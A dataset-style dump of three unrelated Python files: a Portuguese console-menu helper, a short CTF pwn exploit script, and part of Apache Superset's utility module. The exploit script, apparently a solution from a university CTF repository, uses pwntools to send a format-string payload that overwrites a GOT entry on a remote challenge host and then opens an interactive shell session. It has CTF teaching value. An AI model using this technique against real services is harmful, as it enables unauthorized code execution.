dani-fn/Projetinhos_Python
|
692ff0a7f57d8f8f2e28f7b2c38bb6401e013bdb
|
[
"MIT"
] | null | null | null |
def linha(tam=48):
return '-' * tam
def titulo(msg):
print(linha())
print(f'{msg}'.center(48))
print(linha())
def leiaop(msg, a, b):
erro = '\033[31m ERRO! Digite uma opção válida!\033[m'
while True:
try:
v = int(input(msg))
except (TypeError, ValueError):
print(erro)
continue
except KeyboardInterrupt:
print('\033[31;1mEntrada de dados interrompida pelo usuário\033[m')
exit()
else:
if a <= v < b:
return v
else:
print(erro)
def menu(lista):
titulo('MENU PRINCIPAL')
c = 1
for item in lista:
print(f'\033[33m{c}\033[m - \033[34m{item}\033[m')
c += 1
print(linha())
return leiaop('\033[32m Sua opção: \033[m', 1, len(lista)+1)
def leiaint(prompt):
erro = '\033[31m ERRO! Digite uma opção válida!\033[m'
while True:
try:
v = int(input(prompt))
except (TypeError, ValueError):
print(erro)
continue
except KeyboardInterrupt:
print('\033[31;1mEntrada de dados interrompida pelo usuário\033[m')
exit()
else:
return v
| 24.846154 | 80 | 0.496904 |
5144ff2b68f65fe7bc34889af6238ac6e9095f20
| 303 |
py
|
Python
|
2019/pwn/Time/exp.py
|
ZJGSIS/ZJGSUCTF-Challenges
|
460bfaa90f5d13a0958702fa4e479905713738bc
|
[
"MIT"
] | 1 |
2021-11-20T04:13:07.000Z
|
2021-11-20T04:13:07.000Z
|
2019/pwn/Time/exp.py
|
ZJGSIS/ZJGSUCTF-Challenges
|
460bfaa90f5d13a0958702fa4e479905713738bc
|
[
"MIT"
] | null | null | null |
2019/pwn/Time/exp.py
|
ZJGSIS/ZJGSUCTF-Challenges
|
460bfaa90f5d13a0958702fa4e479905713738bc
|
[
"MIT"
] | null | null | null |
from pwn import *
#context.log_level='debug'
got=0x000000000601028
#p=process("./main")
p=remote("10.21.13.190",2699)
#gdb.attach(p)
payload="%{}c%8$hn".format(0x2216).ljust(0x10,'\x00')+p64(got)
payload=payload[:-5]
log.info((payload))
log.info(len(payload))
p.sendafter(".\n",payload)
p.interactive()
| 23.307692 | 62 | 0.70297 |
9f30c64d91f5b7cd62e44cf005989a70748967c6
| 57,274 |
py
|
Python
|
superset/superset/utils/core.py
|
mvbvieira/finance_pipeline
|
48b085aeafda61c82f77de4ae67ceb02ac32f683
|
[
"Apache-2.0"
] | 1 |
2020-11-03T06:34:21.000Z
|
2020-11-03T06:34:21.000Z
|
superset/superset/utils/core.py
|
mvbvieira/finance_pipeline
|
48b085aeafda61c82f77de4ae67ceb02ac32f683
|
[
"Apache-2.0"
] | 57 |
2020-04-20T17:41:41.000Z
|
2022-03-16T21:38:05.000Z
|
superset/superset/utils/core.py
|
mvbvieira/finance_pipeline
|
48b085aeafda61c82f77de4ae67ceb02ac32f683
|
[
"Apache-2.0"
] | 2 |
2021-10-12T17:51:34.000Z
|
2021-10-15T18:55:52.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Utility functions used across Superset"""
# pylint: disable=too-many-lines
import collections
import decimal
import errno
import json
import logging
import os
import platform
import re
import signal
import smtplib
import tempfile
import threading
import traceback
import uuid
import zlib
from datetime import date, datetime, time, timedelta
from distutils.util import strtobool
from email.mime.application import MIMEApplication
from email.mime.image import MIMEImage
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.utils import formatdate
from enum import Enum, IntEnum
from timeit import default_timer
from types import TracebackType
from typing import (
Any,
Callable,
cast,
Dict,
Iterable,
Iterator,
List,
NamedTuple,
Optional,
Sequence,
Set,
Tuple,
Type,
TYPE_CHECKING,
TypeVar,
Union,
)
from urllib.parse import unquote_plus
import bleach
import markdown as md
import numpy as np
import pandas as pd
import sqlalchemy as sa
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.backends.openssl.x509 import _Certificate
from flask import current_app, flash, g, Markup, render_template, request
from flask_appbuilder import SQLA
from flask_appbuilder.security.sqla.models import Role, User
from flask_babel import gettext as __
from flask_babel.speaklater import LazyString
from pandas.api.types import infer_dtype
from pandas.core.dtypes.common import is_numeric_dtype
from sqlalchemy import event, exc, select, Text
from sqlalchemy.dialects.mysql import MEDIUMTEXT
from sqlalchemy.engine import Connection, Engine
from sqlalchemy.engine.reflection import Inspector
from sqlalchemy.sql.elements import TextClause
from sqlalchemy.sql.type_api import Variant
from sqlalchemy.types import TEXT, TypeDecorator, TypeEngine
from typing_extensions import TypedDict, TypeGuard
import _thread # pylint: disable=C0411
from superset.constants import (
EXAMPLES_DB_UUID,
EXTRA_FORM_DATA_APPEND_KEYS,
EXTRA_FORM_DATA_OVERRIDE_EXTRA_KEYS,
EXTRA_FORM_DATA_OVERRIDE_REGULAR_MAPPINGS,
)
from superset.errors import ErrorLevel, SupersetErrorType
from superset.exceptions import (
CertificateException,
SupersetException,
SupersetTimeoutException,
)
from superset.typing import (
AdhocMetric,
AdhocMetricColumn,
FilterValues,
FlaskResponse,
FormData,
Metric,
)
from superset.utils.dates import datetime_to_epoch, EPOCH
from superset.utils.hashing import md5_sha_from_dict, md5_sha_from_str
try:
from pydruid.utils.having import Having
except ImportError:
pass
if TYPE_CHECKING:
from superset.connectors.base.models import BaseColumn, BaseDatasource
from superset.models.core import Database
logging.getLogger("MARKDOWN").setLevel(logging.INFO)
logger = logging.getLogger(__name__)
DTTM_ALIAS = "__timestamp"
NO_TIME_RANGE = "No filter"
TIME_COMPARISION = "__"
JS_MAX_INTEGER = 9007199254740991 # Largest int Java Script can handle 2^53-1
InputType = TypeVar("InputType")
BIND_PARAM_REGEX = TextClause._bind_params_regex # pylint: disable=protected-access
class LenientEnum(Enum):
"""Enums with a `get` method that convert a enum value to `Enum` if it is a
valid value."""
@classmethod
def get(cls, value: Any) -> Any:
try:
return super().__new__(cls, value)
except ValueError:
return None
class AdhocMetricExpressionType(str, Enum):
SIMPLE = "SIMPLE"
SQL = "SQL"
class AnnotationType(str, Enum):
FORMULA = "FORMULA"
INTERVAL = "INTERVAL"
EVENT = "EVENT"
TIME_SERIES = "TIME_SERIES"
class GenericDataType(IntEnum):
"""
Generic database column type that fits both frontend and backend.
"""
NUMERIC = 0
STRING = 1
TEMPORAL = 2
BOOLEAN = 3
# ARRAY = 4 # Mapping all the complex data types to STRING for now
# JSON = 5 # and leaving these as a reminder.
# MAP = 6
# ROW = 7
class ChartDataResultFormat(str, Enum):
"""
Chart data response format
"""
CSV = "csv"
JSON = "json"
class ChartDataResultType(str, Enum):
"""
Chart data response type
"""
COLUMNS = "columns"
FULL = "full"
QUERY = "query"
RESULTS = "results"
SAMPLES = "samples"
TIMEGRAINS = "timegrains"
POST_PROCESSED = "post_processed"
class DatasourceDict(TypedDict):
type: str
id: int
class AdhocFilterClause(TypedDict, total=False):
clause: str
expressionType: str
filterOptionName: Optional[str]
comparator: Optional[FilterValues]
operator: str
subject: str
isExtra: Optional[bool]
sqlExpression: Optional[str]
class QueryObjectFilterClause(TypedDict, total=False):
col: str
op: str # pylint: disable=invalid-name
val: Optional[FilterValues]
grain: Optional[str]
isExtra: Optional[bool]
class ExtraFiltersTimeColumnType(str, Enum):
GRANULARITY = "__granularity"
TIME_COL = "__time_col"
TIME_GRAIN = "__time_grain"
TIME_ORIGIN = "__time_origin"
TIME_RANGE = "__time_range"
class ExtraFiltersReasonType(str, Enum):
NO_TEMPORAL_COLUMN = "no_temporal_column"
COL_NOT_IN_DATASOURCE = "not_in_datasource"
NOT_DRUID_DATASOURCE = "not_druid_datasource"
class FilterOperator(str, Enum):
"""
Operators used filter controls
"""
EQUALS = "=="
NOT_EQUALS = "!="
GREATER_THAN = ">"
LESS_THAN = "<"
GREATER_THAN_OR_EQUALS = ">="
LESS_THAN_OR_EQUALS = "<="
LIKE = "LIKE"
ILIKE = "ILIKE"
IS_NULL = "IS NULL"
IS_NOT_NULL = "IS NOT NULL"
IN = "IN"
NOT_IN = "NOT IN"
REGEX = "REGEX"
IS_TRUE = "IS TRUE"
IS_FALSE = "IS FALSE"
class PostProcessingBoxplotWhiskerType(str, Enum):
"""
Calculate cell contribution to row/column total
"""
TUKEY = "tukey"
MINMAX = "min/max"
PERCENTILE = "percentile"
class PostProcessingContributionOrientation(str, Enum):
"""
Calculate cell contribution to row/column total
"""
ROW = "row"
COLUMN = "column"
class QueryMode(str, LenientEnum):
"""
Whether the query runs on aggregate or returns raw records
"""
RAW = "raw"
AGGREGATE = "aggregate"
class QuerySource(Enum):
"""
The source of a SQL query.
"""
CHART = 0
DASHBOARD = 1
SQL_LAB = 2
class QueryStatus(str, Enum):
"""Enum-type class for query statuses"""
STOPPED: str = "stopped"
FAILED: str = "failed"
PENDING: str = "pending"
RUNNING: str = "running"
SCHEDULED: str = "scheduled"
SUCCESS: str = "success"
FETCHING: str = "fetching"
TIMED_OUT: str = "timed_out"
class DashboardStatus(str, Enum):
"""Dashboard status used for frontend filters"""
PUBLISHED = "published"
DRAFT = "draft"
class ReservedUrlParameters(str, Enum):
"""
Reserved URL parameters that are used internally by Superset. These will not be
passed to chart queries, as they control the behavior of the UI.
"""
STANDALONE = "standalone"
EDIT_MODE = "edit"
@staticmethod
def is_standalone_mode() -> Optional[bool]:
standalone_param = request.args.get(ReservedUrlParameters.STANDALONE.value)
standalone: Optional[bool] = (
standalone_param and standalone_param != "false" and standalone_param != "0"
)
return standalone
class RowLevelSecurityFilterType(str, Enum):
REGULAR = "Regular"
BASE = "Base"
class TimeRangeEndpoint(str, Enum):
"""
The time range endpoint types which represent inclusive, exclusive, or unknown.
Unknown represents endpoints which are ill-defined as though the interval may be
[start, end] the filter may behave like (start, end] due to mixed data types and
lexicographical ordering.
:see: https://github.com/apache/superset/issues/6360
"""
EXCLUSIVE = "exclusive"
INCLUSIVE = "inclusive"
UNKNOWN = "unknown"
class TemporalType(str, Enum):
"""
Supported temporal types
"""
DATE = "DATE"
DATETIME = "DATETIME"
SMALLDATETIME = "SMALLDATETIME"
TEXT = "TEXT"
TIME = "TIME"
TIMESTAMP = "TIMESTAMP"
class ColumnTypeSource(Enum):
GET_TABLE = 1
CURSOR_DESCRIPION = 2
class ColumnSpec(NamedTuple):
sqla_type: Union[TypeEngine, str]
generic_type: GenericDataType
is_dttm: bool
python_date_format: Optional[str] = None
try:
# Having might not have been imported.
class DimSelector(Having):
def __init__(self, **args: Any) -> None:
# Just a hack to prevent any exceptions
Having.__init__(self, type="equalTo", aggregation=None, value=None)
self.having = {
"having": {
"type": "dimSelector",
"dimension": args["dimension"],
"value": args["value"],
}
}
except NameError:
pass
def flasher(msg: str, severity: str = "message") -> None:
"""Flask's flash if available, logging call if not"""
try:
flash(msg, severity)
except RuntimeError:
if severity == "danger":
logger.error(msg, exc_info=True)
else:
logger.info(msg)
def parse_js_uri_path_item(
item: Optional[str], unquote: bool = True, eval_undefined: bool = False
) -> Optional[str]:
"""Parse a uri path item made with js.
:param item: a uri path component
:param unquote: Perform unquoting of string using urllib.parse.unquote_plus()
:param eval_undefined: When set to True and item is either 'null' or 'undefined',
assume item is undefined and return None.
:return: Either None, the original item or unquoted item
"""
item = None if eval_undefined and item in ("null", "undefined") else item
return unquote_plus(item) if unquote and item else item
def cast_to_num(value: Optional[Union[float, int, str]]) -> Optional[Union[float, int]]:
"""Casts a value to an int/float
>>> cast_to_num('1 ')
1.0
>>> cast_to_num(' 2')
2.0
>>> cast_to_num('5')
5
>>> cast_to_num('5.2')
5.2
>>> cast_to_num(10)
10
>>> cast_to_num(10.1)
10.1
>>> cast_to_num(None) is None
True
>>> cast_to_num('this is not a string') is None
True
:param value: value to be converted to numeric representation
:returns: value cast to `int` if value is all digits, `float` if `value` is
decimal value and `None`` if it can't be converted
"""
if value is None:
return None
if isinstance(value, (int, float)):
return value
if value.isdigit():
return int(value)
try:
return float(value)
except ValueError:
return None
def cast_to_boolean(value: Any) -> Optional[bool]:
"""Casts a value to an int/float
>>> cast_to_boolean(1)
True
>>> cast_to_boolean(0)
False
>>> cast_to_boolean(0.5)
True
>>> cast_to_boolean('true')
True
>>> cast_to_boolean('false')
False
>>> cast_to_boolean('False')
False
>>> cast_to_boolean(None)
:param value: value to be converted to boolean representation
:returns: value cast to `bool`. when value is 'true' or value that are not 0
converted into True. Return `None` if value is `None`
"""
if value is None:
return None
if isinstance(value, (int, float)):
return value != 0
if isinstance(value, str):
return value.strip().lower() == "true"
return False
def list_minus(l: List[Any], minus: List[Any]) -> List[Any]:
"""Returns l without what is in minus
>>> list_minus([1, 2, 3], [2])
[1, 3]
"""
return [o for o in l if o not in minus]
class DashboardEncoder(json.JSONEncoder):
def __init__(self, *args: Any, **kwargs: Any) -> None:
super().__init__(*args, **kwargs)
self.sort_keys = True
def default(self, o: Any) -> Union[Dict[Any, Any], str]:
if isinstance(o, uuid.UUID):
return str(o)
try:
vals = {k: v for k, v in o.__dict__.items() if k != "_sa_instance_state"}
return {"__{}__".format(o.__class__.__name__): vals}
except Exception: # pylint: disable=broad-except
if isinstance(o, datetime):
return {"__datetime__": o.replace(microsecond=0).isoformat()}
return json.JSONEncoder(sort_keys=True).default(o)
class JSONEncodedDict(TypeDecorator): # pylint: disable=abstract-method
"""Represents an immutable structure as a json-encoded string."""
impl = TEXT
def process_bind_param(
self, value: Optional[Dict[Any, Any]], dialect: str
) -> Optional[str]:
return json.dumps(value) if value is not None else None
def process_result_value(
self, value: Optional[str], dialect: str
) -> Optional[Dict[Any, Any]]:
return json.loads(value) if value is not None else None
def format_timedelta(time_delta: timedelta) -> str:
"""
Ensures negative time deltas are easily interpreted by humans
>>> td = timedelta(0) - timedelta(days=1, hours=5,minutes=6)
>>> str(td)
'-2 days, 18:54:00'
>>> format_timedelta(td)
'-1 day, 5:06:00'
"""
if time_delta < timedelta(0):
return "-" + str(abs(time_delta))
# Change this to format positive time deltas the way you want
return str(time_delta)
def base_json_conv(obj: Any,) -> Any: # pylint: disable=inconsistent-return-statements
if isinstance(obj, memoryview):
obj = obj.tobytes()
if isinstance(obj, np.int64):
return int(obj)
if isinstance(obj, np.bool_):
return bool(obj)
if isinstance(obj, np.ndarray):
return obj.tolist()
if isinstance(obj, set):
return list(obj)
if isinstance(obj, decimal.Decimal):
return float(obj)
if isinstance(obj, uuid.UUID):
return str(obj)
if isinstance(obj, timedelta):
return format_timedelta(obj)
if isinstance(obj, bytes):
try:
return obj.decode("utf-8")
except Exception: # pylint: disable=broad-except
return "[bytes]"
if isinstance(obj, LazyString):
return str(obj)
def json_iso_dttm_ser(obj: Any, pessimistic: bool = False) -> str:
"""
json serializer that deals with dates
>>> dttm = datetime(1970, 1, 1)
>>> json.dumps({'dttm': dttm}, default=json_iso_dttm_ser)
'{"dttm": "1970-01-01T00:00:00"}'
"""
val = base_json_conv(obj)
if val is not None:
return val
if isinstance(obj, (datetime, date, time, pd.Timestamp)):
obj = obj.isoformat()
else:
if pessimistic:
return "Unserializable [{}]".format(type(obj))
raise TypeError("Unserializable object {} of type {}".format(obj, type(obj)))
return obj
def pessimistic_json_iso_dttm_ser(obj: Any) -> str:
"""Proxy to call json_iso_dttm_ser in a pessimistic way
If one of object is not serializable to json, it will still succeed"""
return json_iso_dttm_ser(obj, pessimistic=True)
def json_int_dttm_ser(obj: Any) -> float:
"""json serializer that deals with dates"""
val = base_json_conv(obj)
if val is not None:
return val
if isinstance(obj, (datetime, pd.Timestamp)):
obj = datetime_to_epoch(obj)
elif isinstance(obj, date):
obj = (obj - EPOCH.date()).total_seconds() * 1000
else:
raise TypeError("Unserializable object {} of type {}".format(obj, type(obj)))
return obj
def json_dumps_w_dates(payload: Dict[Any, Any]) -> str:
return json.dumps(payload, default=json_int_dttm_ser)
def error_msg_from_exception(ex: Exception) -> str:
"""Translate exception into error message
Database have different ways to handle exception. This function attempts
to make sense of the exception object and construct a human readable
sentence.
TODO(bkyryliuk): parse the Presto error message from the connection
created via create_engine.
engine = create_engine('presto://localhost:3506/silver') -
gives an e.message as the str(dict)
presto.connect('localhost', port=3506, catalog='silver') - as a dict.
The latter version is parsed correctly by this function.
"""
msg = ""
if hasattr(ex, "message"):
if isinstance(ex.message, dict): # type: ignore
msg = ex.message.get("message") # type: ignore
elif ex.message: # type: ignore
msg = ex.message # type: ignore
return msg or str(ex)
def markdown(raw: str, markup_wrap: Optional[bool] = False) -> str:
safe_markdown_tags = [
"h1",
"h2",
"h3",
"h4",
"h5",
"h6",
"b",
"i",
"strong",
"em",
"tt",
"p",
"br",
"span",
"div",
"blockquote",
"code",
"hr",
"ul",
"ol",
"li",
"dd",
"dt",
"img",
"a",
]
safe_markdown_attrs = {
"img": ["src", "alt", "title"],
"a": ["href", "alt", "title"],
}
safe = md.markdown(
raw or "",
extensions=[
"markdown.extensions.tables",
"markdown.extensions.fenced_code",
"markdown.extensions.codehilite",
],
)
safe = bleach.clean(safe, safe_markdown_tags, safe_markdown_attrs)
if markup_wrap:
safe = Markup(safe)
return safe
def readfile(file_path: str) -> Optional[str]:
with open(file_path) as f:
content = f.read()
return content
def generic_find_constraint_name(
table: str, columns: Set[str], referenced: str, database: SQLA
) -> Optional[str]:
"""Utility to find a constraint name in alembic migrations"""
tbl = sa.Table(
table, database.metadata, autoload=True, autoload_with=database.engine
)
for fk in tbl.foreign_key_constraints:
if fk.referred_table.name == referenced and set(fk.column_keys) == columns:
return fk.name
return None
def generic_find_fk_constraint_name(
table: str, columns: Set[str], referenced: str, insp: Inspector
) -> Optional[str]:
"""Utility to find a foreign-key constraint name in alembic migrations"""
for fk in insp.get_foreign_keys(table):
if (
fk["referred_table"] == referenced
and set(fk["referred_columns"]) == columns
):
return fk["name"]
return None
def generic_find_fk_constraint_names( # pylint: disable=invalid-name
table: str, columns: Set[str], referenced: str, insp: Inspector
) -> Set[str]:
"""Utility to find foreign-key constraint names in alembic migrations"""
names = set()
for fk in insp.get_foreign_keys(table):
if (
fk["referred_table"] == referenced
and set(fk["referred_columns"]) == columns
):
names.add(fk["name"])
return names
def generic_find_uq_constraint_name(
table: str, columns: Set[str], insp: Inspector
) -> Optional[str]:
"""Utility to find a unique constraint name in alembic migrations"""
for uq in insp.get_unique_constraints(table):
if columns == set(uq["column_names"]):
return uq["name"]
return None
def get_datasource_full_name(
database_name: str, datasource_name: str, schema: Optional[str] = None
) -> str:
if not schema:
return "[{}].[{}]".format(database_name, datasource_name)
return "[{}].[{}].[{}]".format(database_name, schema, datasource_name)
def validate_json(obj: Union[bytes, bytearray, str]) -> None:
if obj:
try:
json.loads(obj)
except Exception as ex:
logger.error("JSON is not valid %s", str(ex), exc_info=True)
raise SupersetException("JSON is not valid") from ex
class SigalrmTimeout:
"""
To be used in a ``with`` block and timeout its content.
"""
def __init__(self, seconds: int = 1, error_message: str = "Timeout") -> None:
self.seconds = seconds
self.error_message = error_message
def handle_timeout( # pylint: disable=unused-argument
self, signum: int, frame: Any
) -> None:
logger.error("Process timed out", exc_info=True)
raise SupersetTimeoutException(
error_type=SupersetErrorType.BACKEND_TIMEOUT_ERROR,
message=self.error_message,
level=ErrorLevel.ERROR,
extra={"timeout": self.seconds},
)
def __enter__(self) -> None:
try:
if threading.current_thread() == threading.main_thread():
signal.signal(signal.SIGALRM, self.handle_timeout)
signal.alarm(self.seconds)
except ValueError as ex:
logger.warning("timeout can't be used in the current context")
logger.exception(ex)
def __exit__( # pylint: disable=redefined-outer-name,redefined-builtin
self, type: Any, value: Any, traceback: TracebackType
) -> None:
try:
signal.alarm(0)
except ValueError as ex:
logger.warning("timeout can't be used in the current context")
logger.exception(ex)
class TimerTimeout:
def __init__(self, seconds: int = 1, error_message: str = "Timeout") -> None:
self.seconds = seconds
self.error_message = error_message
self.timer = threading.Timer(seconds, _thread.interrupt_main)
def __enter__(self) -> None:
self.timer.start()
def __exit__( # pylint: disable=redefined-outer-name,redefined-builtin
self, type: Any, value: Any, traceback: TracebackType
) -> None:
self.timer.cancel()
if type is KeyboardInterrupt: # raised by _thread.interrupt_main
raise SupersetTimeoutException(
error_type=SupersetErrorType.BACKEND_TIMEOUT_ERROR,
message=self.error_message,
level=ErrorLevel.ERROR,
extra={"timeout": self.seconds},
)
# Windows has no support for SIGALRM, so we use the timer based timeout
timeout: Union[Type[TimerTimeout], Type[SigalrmTimeout]] = (
TimerTimeout if platform.system() == "Windows" else SigalrmTimeout
)
def pessimistic_connection_handling(some_engine: Engine) -> None:
@event.listens_for(some_engine, "engine_connect")
def ping_connection(connection: Connection, branch: bool) -> None:
if branch:
# 'branch' refers to a sub-connection of a connection,
# we don't want to bother pinging on these.
return
# turn off 'close with result'. This flag is only used with
# 'connectionless' execution, otherwise will be False in any case
save_should_close_with_result = connection.should_close_with_result
connection.should_close_with_result = False
try:
# run a SELECT 1. use a core select() so that
# the SELECT of a scalar value without a table is
# appropriately formatted for the backend
connection.scalar(select([1]))
except exc.DBAPIError as err:
# catch SQLAlchemy's DBAPIError, which is a wrapper
# for the DBAPI's exception. It includes a .connection_invalidated
# attribute which specifies if this connection is a 'disconnect'
# condition, which is based on inspection of the original exception
# by the dialect in use.
if err.connection_invalidated:
# run the same SELECT again - the connection will re-validate
# itself and establish a new connection. The disconnect detection
# here also causes the whole connection pool to be invalidated
# so that all stale connections are discarded.
connection.scalar(select([1]))
else:
raise
finally:
# restore 'close with result'
connection.should_close_with_result = save_should_close_with_result
def notify_user_about_perm_udate( # pylint: disable=too-many-arguments
granter: User,
user: User,
role: Role,
datasource: "BaseDatasource",
tpl_name: str,
config: Dict[str, Any],
) -> None:
msg = render_template(
tpl_name, granter=granter, user=user, role=role, datasource=datasource
)
logger.info(msg)
subject = __(
"[Superset] Access to the datasource %(name)s was granted",
name=datasource.full_name,
)
send_email_smtp(
user.email,
subject,
msg,
config,
bcc=granter.email,
dryrun=not config["EMAIL_NOTIFICATIONS"],
)
def send_email_smtp( # pylint: disable=invalid-name,too-many-arguments,too-many-locals
to: str,
subject: str,
html_content: str,
config: Dict[str, Any],
files: Optional[List[str]] = None,
data: Optional[Dict[str, str]] = None,
images: Optional[Dict[str, bytes]] = None,
dryrun: bool = False,
cc: Optional[str] = None,
bcc: Optional[str] = None,
mime_subtype: str = "mixed",
) -> None:
"""
Send an email with html content, eg:
send_email_smtp(
'[email protected]', 'foo', '<b>Foo</b> bar',['/dev/null'], dryrun=True)
"""
smtp_mail_from = config["SMTP_MAIL_FROM"]
smtp_mail_to = get_email_address_list(to)
msg = MIMEMultipart(mime_subtype)
msg["Subject"] = subject
msg["From"] = smtp_mail_from
msg["To"] = ", ".join(smtp_mail_to)
msg.preamble = "This is a multi-part message in MIME format."
recipients = smtp_mail_to
if cc:
smtp_mail_cc = get_email_address_list(cc)
msg["CC"] = ", ".join(smtp_mail_cc)
recipients = recipients + smtp_mail_cc
if bcc:
# don't add bcc in header
smtp_mail_bcc = get_email_address_list(bcc)
recipients = recipients + smtp_mail_bcc
msg["Date"] = formatdate(localtime=True)
mime_text = MIMEText(html_content, "html")
msg.attach(mime_text)
# Attach files by reading them from disk
for fname in files or []:
basename = os.path.basename(fname)
with open(fname, "rb") as f:
msg.attach(
MIMEApplication(
f.read(),
Content_Disposition="attachment; filename='%s'" % basename,
Name=basename,
)
)
# Attach any files passed directly
for name, body in (data or {}).items():
msg.attach(
MIMEApplication(
body, Content_Disposition="attachment; filename='%s'" % name, Name=name
)
)
# Attach any inline images, which may be required for display in
# HTML content (inline)
for msgid, imgdata in (images or {}).items():
image = MIMEImage(imgdata)
image.add_header("Content-ID", "<%s>" % msgid)
image.add_header("Content-Disposition", "inline")
msg.attach(image)
send_mime_email(smtp_mail_from, recipients, msg, config, dryrun=dryrun)
def send_mime_email(
e_from: str,
e_to: List[str],
mime_msg: MIMEMultipart,
config: Dict[str, Any],
dryrun: bool = False,
) -> None:
smtp_host = config["SMTP_HOST"]
smtp_port = config["SMTP_PORT"]
smtp_user = config["SMTP_USER"]
smtp_password = config["SMTP_PASSWORD"]
smtp_starttls = config["SMTP_STARTTLS"]
smtp_ssl = config["SMTP_SSL"]
if not dryrun:
smtp = (
smtplib.SMTP_SSL(smtp_host, smtp_port)
if smtp_ssl
else smtplib.SMTP(smtp_host, smtp_port)
)
if smtp_starttls:
smtp.starttls()
if smtp_user and smtp_password:
smtp.login(smtp_user, smtp_password)
logger.debug("Sent an email to %s", str(e_to))
smtp.sendmail(e_from, e_to, mime_msg.as_string())
smtp.quit()
else:
logger.info("Dryrun enabled, email notification content is below:")
logger.info(mime_msg.as_string())
def get_email_address_list(address_string: str) -> List[str]:
address_string_list: List[str] = []
if isinstance(address_string, str):
address_string_list = re.split(r",|\s|;", address_string)
return [x.strip() for x in address_string_list if x.strip()]
def get_email_address_str(address_string: str) -> str:
address_list = get_email_address_list(address_string)
address_list_str = ", ".join(address_list)
return address_list_str
def choicify(values: Iterable[Any]) -> List[Tuple[Any, Any]]:
"""Takes an iterable and makes an iterable of tuples with it"""
return [(v, v) for v in values]
def zlib_compress(data: Union[bytes, str]) -> bytes:
"""
Compress things in a py2/3 safe fashion
>>> json_str = '{"test": 1}'
>>> blob = zlib_compress(json_str)
"""
if isinstance(data, str):
return zlib.compress(bytes(data, "utf-8"))
return zlib.compress(data)
def zlib_decompress(blob: bytes, decode: Optional[bool] = True) -> Union[bytes, str]:
"""
Decompress things to a string in a py2/3 safe fashion
>>> json_str = '{"test": 1}'
>>> blob = zlib_compress(json_str)
>>> got_str = zlib_decompress(blob)
>>> got_str == json_str
True
"""
if isinstance(blob, bytes):
decompressed = zlib.decompress(blob)
else:
decompressed = zlib.decompress(bytes(blob, "utf-8"))
return decompressed.decode("utf-8") if decode else decompressed
def simple_filter_to_adhoc(
filter_clause: QueryObjectFilterClause, clause: str = "where",
) -> AdhocFilterClause:
result: AdhocFilterClause = {
"clause": clause.upper(),
"expressionType": "SIMPLE",
"comparator": filter_clause.get("val"),
"operator": filter_clause["op"],
"subject": filter_clause["col"],
}
if filter_clause.get("isExtra"):
result["isExtra"] = True
result["filterOptionName"] = md5_sha_from_dict(cast(Dict[Any, Any], result))
return result
def form_data_to_adhoc(form_data: Dict[str, Any], clause: str) -> AdhocFilterClause:
if clause not in ("where", "having"):
raise ValueError(__("Unsupported clause type: %(clause)s", clause=clause))
result: AdhocFilterClause = {
"clause": clause.upper(),
"expressionType": "SQL",
"sqlExpression": form_data.get(clause),
}
result["filterOptionName"] = md5_sha_from_dict(cast(Dict[Any, Any], result))
return result
def merge_extra_form_data(form_data: Dict[str, Any]) -> None:
"""
Merge extra form data (appends and overrides) into the main payload
and add applied time extras to the payload.
"""
filter_keys = ["filters", "adhoc_filters"]
extra_form_data = form_data.pop("extra_form_data", {})
append_filters: List[QueryObjectFilterClause] = extra_form_data.get("filters", None)
# merge append extras
for key in [key for key in EXTRA_FORM_DATA_APPEND_KEYS if key not in filter_keys]:
extra_value = getattr(extra_form_data, key, {})
form_value = getattr(form_data, key, {})
form_value.update(extra_value)
if form_value:
form_data["key"] = extra_value
# map regular extras that apply to form data properties
for src_key, target_key in EXTRA_FORM_DATA_OVERRIDE_REGULAR_MAPPINGS.items():
value = extra_form_data.get(src_key)
if value is not None:
form_data[target_key] = value
# map extras that apply to form data extra properties
extras = form_data.get("extras", {})
for key in EXTRA_FORM_DATA_OVERRIDE_EXTRA_KEYS:
value = extra_form_data.get(key)
if value is not None:
extras[key] = value
if extras:
form_data["extras"] = extras
adhoc_filters: List[AdhocFilterClause] = form_data.get("adhoc_filters", [])
form_data["adhoc_filters"] = adhoc_filters
append_adhoc_filters: List[AdhocFilterClause] = extra_form_data.get(
"adhoc_filters", []
)
adhoc_filters.extend(
{"isExtra": True, **fltr} for fltr in append_adhoc_filters # type: ignore
)
if append_filters:
adhoc_filters.extend(
simple_filter_to_adhoc({"isExtra": True, **fltr}) # type: ignore
for fltr in append_filters
if fltr
)
def merge_extra_filters(form_data: Dict[str, Any]) -> None:
# extra_filters are temporary/contextual filters (using the legacy constructs)
# that are external to the slice definition. We use those for dynamic
# interactive filters like the ones emitted by the "Filter Box" visualization.
# Note extra_filters only support simple filters.
applied_time_extras: Dict[str, str] = {}
form_data["applied_time_extras"] = applied_time_extras
adhoc_filters = form_data.get("adhoc_filters", [])
form_data["adhoc_filters"] = adhoc_filters
merge_extra_form_data(form_data)
if "extra_filters" in form_data:
# __form and __to are special extra_filters that target time
# boundaries. The rest of extra_filters are simple
# [column_name in list_of_values]. `__` prefix is there to avoid
# potential conflicts with column that would be named `from` or `to`
date_options = {
"__time_range": "time_range",
"__time_col": "granularity_sqla",
"__time_grain": "time_grain_sqla",
"__time_origin": "druid_time_origin",
"__granularity": "granularity",
}
# Grab list of existing filters 'keyed' on the column and operator
def get_filter_key(f: Dict[str, Any]) -> str:
if "expressionType" in f:
return "{}__{}".format(f["subject"], f["operator"])
return "{}__{}".format(f["col"], f["op"])
existing_filters = {}
for existing in adhoc_filters:
if (
existing["expressionType"] == "SIMPLE"
and existing.get("comparator") is not None
and existing.get("subject") is not None
):
existing_filters[get_filter_key(existing)] = existing["comparator"]
for filtr in form_data[ # pylint: disable=too-many-nested-blocks
"extra_filters"
]:
filtr["isExtra"] = True
# Pull out time filters/options and merge into form data
filter_column = filtr["col"]
time_extra = date_options.get(filter_column)
if time_extra:
time_extra_value = filtr.get("val")
if time_extra_value and time_extra_value != NO_TIME_RANGE:
form_data[time_extra] = time_extra_value
